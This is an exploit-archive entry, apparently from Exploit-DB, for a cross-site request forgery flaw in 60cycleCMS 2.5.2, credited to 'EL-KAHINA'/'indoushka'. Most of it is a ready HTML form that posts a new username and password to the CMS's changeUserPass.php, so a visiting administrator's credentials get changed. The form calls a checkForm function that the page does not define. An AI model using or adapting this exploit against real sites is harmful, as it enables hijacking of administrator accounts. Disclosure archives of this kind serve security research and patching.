60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change Username and Password)



EKU-ID: 19475 CVE: OSVDB-ID:
Author: EL-KAHINA Published: 2010-04-16 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


========================================================================================
| # Title    : 60 cycleCMS V 2.5.2 CSRF Change Username & Password Exploit
| # Author   : EL-KAHINA
| # Home     : www.iqs3cur1ty.com/vb
| # Web Site : http://php.opensourcecms.com/scripts/details.php?scriptid=337
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
| # Bug      : CSRF
======================      Exploit By indoushka       =================================
 # Exploit  :

<html>
<body>
<h2>Change Username or Password</h2>
<p>Enter desired username and password.</p>
<form action="http://127.0.0.1/60cycleCMS.2.5.2/private/changeUserPass.php" method="post" name="changeUserPass">
Desired Username: <input name="user" type="text" /><br />
Desired Password: <input name="pass" type="password"/><br />
Confirm Desired Password: <input name="passConfirm" type="password"/><br />
<input type="button" value="Submit" onclick="checkForm(this.form)" />
</form>
</body>
</html>

==========================================
Greetz : Exploit-db Team
all my friend :(Dz-Ghost Team )
im indoushka's sister
------------------------------------------